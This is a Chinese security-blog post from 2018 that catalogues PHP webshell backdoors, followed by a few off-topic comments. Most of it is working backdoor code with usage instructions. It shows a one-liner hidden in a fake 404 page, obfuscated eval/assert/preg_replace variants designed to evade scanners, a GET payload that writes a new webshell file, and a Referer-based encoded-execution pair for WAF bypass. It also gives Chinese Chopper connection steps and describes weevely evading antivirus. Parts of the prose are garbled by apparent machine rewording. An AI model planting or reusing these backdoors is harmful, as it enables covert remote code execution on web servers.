PHP牛逼的后门盘点

作者:MA2安全团队 分类: 信息安全 发布于:2018-3-3 14:03 ė1277次浏览 64条评论

我们以一个学习的心态来看待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。

强悍的PHP一句话后门

这类后门让网站、效劳器管理员很是头疼,经常要换着办法停止各种检测,而很多新呈现的编写技术,用普通的检测办法是没法发现并处置的。今天我们细数一些有意义的PHP一句话木马。

应用404页面躲藏PHP小马:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found'); ?>

404页面是网站常用的文件,普通倡议好后很少有人会去对它停止检查修正,这时我们能够应用这一点停止躲藏后门。

无特征躲藏PHP一句话:

<?php
session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

将$_POST[‘code’]的内容赋值给$_SESSION[‘theCode’],然后执行$_SESSION[‘theCode’],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。

超级隐蔽的PHP后门:

<?php $_GET[a]($_GET[b]);?>

仅用GET函数就构成了木马;

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可藐视,简简单单的一句话,被延伸到这般应用。

层级恳求,编码运转PHP后门:

此办法用两个文件完成,

CODE 1

<?php //1.php header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10' && count($a) == 9) {
   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}

CODE 2

<?php //2.php header('Content-type:text/html;charset=utf-8'); //要执行的代码 $code = <<<CODE
phpinfo();
CODE; //进行base64编码 $code = base64_encode($code); //构造referer字符串 $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i="; //后门url $url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options); echo curl_exec($ch);

经过HTTP恳求中的HTTP_REFERER来运转经过base64编码的代码,来到达后门的效果,普通waf对referer这些检测要松一点,或者没有检测。用这个思绪bypass waf不错。

PHP后门生成工具weevely

weevely是一款针对PHP的webshell的自在软件,可用于模仿一个相似于telnet的衔接shell,weevely通常用于web程序的破绽应用,躲藏后门或者运用相似telnet的方式来替代web 页面式的管理,weevely生成的效劳器端php代码是经过了base64编码的,所以能够骗过主流的杀毒软件和IDS,上传效劳器端代码后通常能够经过weevely直接运转。

weevely所生成的PHP后门所运用的办法是如今比拟主流的base64加密分离字符串变形技术,后门中所运用的函数均是常用的字符串处置函数,被作为检查规则的eval,system等函数都不会直接呈现在代码中,从而能够致使后门文件绕过后门查找工具的检查。运用暗组的Web后门查杀工具停止扫描,结果显现该文件无任何要挟。

三个变形的一句话PHP木马 
1

<?php ($_=@$_GET[2]).@$_($_POST[1])?>

在菜刀里写http://site/1.php?2=assert密码是1

2

<?php $_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

在菜刀里写http://site/2.php?_=assert&__=eval($_POST[‘pass’]) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

第三个

($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

列几个高级的PHP一句话木马后门:

1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 2、
$filename=$_GET['xbid']; include ($filename); //危险的include函数,直接编译任何文件为php格式运行 3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); //重命名任何文件 4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 5include ($uid); //危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif //gif插一句话 6、典型一句话
程序后门代码 <?php eval_r($_POST[sb])?> 程序代码 <?php @eval_r($_POST[sb])?> //容错代码 程序代码 <?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句 程序代码 <?$_POST['sa']($_POST['sb']);?> 程序代码 <?$_POST['sa']($_POST['sb'],$_POST['sc'])?> 程序代码 <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?> //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 程序代码
<O>h=@eval_r($_POST1);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script> //绕过<?限制的一句话

 

本文出自 MA2安全网,转载时请注明出处及相应链接。

评论

  1. rardCom 2019-11-22 11:09 回复

    posso usare l'italiano or english

  2. rardCom 2019-10-25 15:45 回复

    hi :) bross :)

  3. itaVilia 2019-09-27 14:07 回复

    Ciao a tutti vengo dall'italia

  4. rardCom 2019-09-25 14:13 回复

    Hello. And Bye.

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部